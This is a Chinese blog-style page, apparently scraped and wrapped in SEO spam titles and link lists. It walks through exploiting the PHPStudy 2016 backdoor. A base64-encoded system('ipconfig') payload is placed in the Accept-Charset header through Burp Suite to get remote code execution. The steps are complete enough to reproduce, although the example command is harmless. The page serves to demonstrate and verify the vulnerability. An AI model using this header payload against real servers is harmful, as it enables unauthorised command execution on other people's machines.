当前位置: 首页 > news >正文

中国设计网站官网cnd设计案例网

中国设计网站官网cnd,设计案例网,简单网站建设教程,湖南专业seo公司文章目录 漏洞描述漏洞验证 漏洞描述 PHPStudyRCE(Remote Code Execution),也称为phpstudy_backdoor漏洞,是指PHPStudy软件中存在的一个远程代码执行漏洞。 漏洞验证 打开phpstudy2016,用bp自带的浏览器访问www目录下…

文章目录

  • 漏洞描述
  • 漏洞验证

漏洞描述

PHPStudyRCE(Remote Code Execution),也称为phpstudy_backdoor漏洞,是指PHPStudy软件中存在的一个远程代码执行漏洞。

漏洞验证

打开phpstudy2016,用bp自带的浏览器访问www目录下的phpinfo.php文件,访问后结果如下:
在这里插入图片描述

然后在bp中将抓到的数据包发送到repeater模块:

在这里插入图片描述

将system(‘ipconfig’);命令做base64编码:

system('ipconfig');

编码后

c3lzdGVtKCdpcGNvbmZpZycpOw==

在这里插入图片描述

然后在repeater模块添加Accept-Charset: 字段,将base64编码放入:

Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==

注意Accept-Encoding字段中gzip和deflate之间不能有空格!

在这里插入图片描述

去掉空格后点击send发送,ipconfig命令被执行:

在这里插入图片描述

http://www.tj-hxxt.cn/news/48729.html

相关文章:

  • 深圳做网站价格长春seo网站管理
  • html5做的网站搜了网推广效果怎么样
  • 上饶婚纱工作室网站建设友链之家
  • wordpress+浮动播放器站长之家seo综合
  • ppt设计制作佛山外贸seo
  • 徐州企业网站建设公司扬州网络优化推广
  • 网站跟网页的区别是什么全球外贸b2b网站
  • 团购网站建设荆州百度推广
  • 什么网站可以免费做视频的软件下载免费seo免费培训
  • 企业建站 炫酷模板重庆seo关键词优化服务
  • 文档下载网站 建设整站优化工具
  • 网站开发合作合同范本搜索引擎优化的办法有哪些
  • 建筑网建设通网站作用是什么意思新乡seo顾问
  • 中国万网怎么自己做网站网络安全培训机构哪家好
  • 如何免费建一个学校网站企业站seo
  • 深圳罗湖外贸网站建设免费模板
  • 妇科医院网站建设怎么做百度seo优化多少钱
  • 网站怎么换域名网络营销的内涵
  • 郫县网站建设俄罗斯搜索引擎yandex推广
  • 哪里有服务好的网站建设公司厨师培训机构
  • 中国建设银行网站密码百度人工
  • 国外教育网站模板seo北京
  • 长沙有哪些知名网站网站发帖推广平台
  • 王者荣耀网站建设的步骤国内搜索引擎排名第一的是
  • wordpress网站 frp穿透今日新闻大事件
  • 网站制作 flash 修改互联网品牌的快速推广
  • 网站怎么开发设计免费自建网站有哪些
  • 电商网站前端模板google永久免费的服务器
  • 广州地铁21号线网站seo规划
  • 微信号注册官方网站网站建设主要推广方式